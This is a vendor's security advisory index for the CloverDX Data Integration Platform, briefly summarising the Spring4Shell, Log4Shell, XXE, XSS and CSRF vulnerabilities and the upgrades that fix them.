Refer to this board to find the latest security advisories for CloverDX Data Integration Platform.
For inquiries please contact us at firstname.lastname@example.org.
CloverDX Security Advisories
Last update date
|Security Advisory April 2022 - Spring4Shell
All supported CloverDX versions have fix available. Information about fix included.
This advisory discloses one critical severity vulnerability in Spring Framework and provides an overview of its impact on CloverDX products.
The vulnerability (CVE-2022-22965, also known as Spring4Shell) is an RCE (Remote Code Execution) vulnerability in Spring Framework. Spring Framework is used in CloverDX as one of the technologies powering CloverDX Server Console. The vulnerability allows attacker to exploit data binding functionality in Spring to execute arbitrary code on the target system.
|Security Advisory December 2021
As of 22 February, CloverDX has addressed all vulnerabilities related to Log4j.
Please read details in the advisory to find out about available maintenance releases and update steps.
This advisory discloses several critical, high and medium severity security vulnerabilities commonly known as “Log4Shell” and provides overview of their impact on CloverDX products. These vulnerabilities allow attackers to exploit JNDI lookups and other Log4j features to execute arbitrary code.
|Security Advisory November 2021||29-November-2021||
This advisory discloses one medium severity security vulnerability in CloverDX Server. The vulnerability (CVE-2021-42776) is an XXE (XML External Entity) vulnerability in CloverDX Server Console. This vulnerability allows users to read content of local files on CloverDX Server that they might not be able to access otherwise.
The vulnerability can be fixed by upgrading to newer version of CloverDX Server as described in Fixed product versions section (see details in the advisory).
|Security Advisory April 2021||12-April-2021||
This advisory discloses two high severity security vulnerabilities in CloverDX Server. The first vulnerability (CVE-2021-29995) is an XSS vulnerability in CloverDX Server Simple HTTP API while the second one (CVE-2021-30133) is a CSRF vulnerability in CloverDX Server – see below for more details.
Both vulnerabilities affect the same versions of CloverDX Server and can be fixed by upgrading to newer CloverDX release as detailed below.